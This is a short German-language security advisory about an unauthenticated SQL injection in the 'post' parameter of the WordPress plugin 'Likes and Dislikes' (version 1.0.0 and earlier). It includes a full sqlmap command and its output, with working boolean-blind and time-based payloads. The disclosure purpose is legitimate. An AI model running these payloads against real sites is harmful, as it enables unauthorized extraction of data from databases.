
Likes and Dislikes Plugin <= 1.0.0 - Unauthentifizierte SQL-Injection
Likes and Dislikes Plugin <= 1.0.0 - Nicht authentifizierte SQL-Injection
Das Plugin Likes and Dislikes für WordPress ist anfällig für SQL-Injection über den 'post'-Parameter in allen Versionen bis einschließlich 1.0.0 aufgrund unzureichender Maskierung des benutzerdefinierten Parameters und fehlender ausreichender Vorbereitung der bestehenden SQL-Abfrage. Dies ermöglicht es nicht authentifizierten Angreifern, zusätzliche SQL-Abfragen in bereits vorhandene Abfragen einzufügen, die zum Extrahieren sensibler Informationen aus der Datenbank verwendet werden können.
python3 sqlmap.py -u 'http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php' --data='action=my_likes_dislikes_action&post=1&state=dislike' --level=2 --risk=2 --dbms='MySQL' -p post --random-agent
sqlmap identified the following injection point(s) with a total of 372 HTTP(s) requests:
---
Parameter: post (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: action=my_likes_dislikes_action&post=1 AND 8197=(SELECT (CASE WHEN (8197=8197) THEN 8197 ELSE (SELECT 7036 UNION SELECT 3343) END))-- -&state=dislike
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=my_likes_dislikes_action&post=1 AND (SELECT 7318 FROM (SELECT(SLEEP(5)))OIPg)&state=dislike
---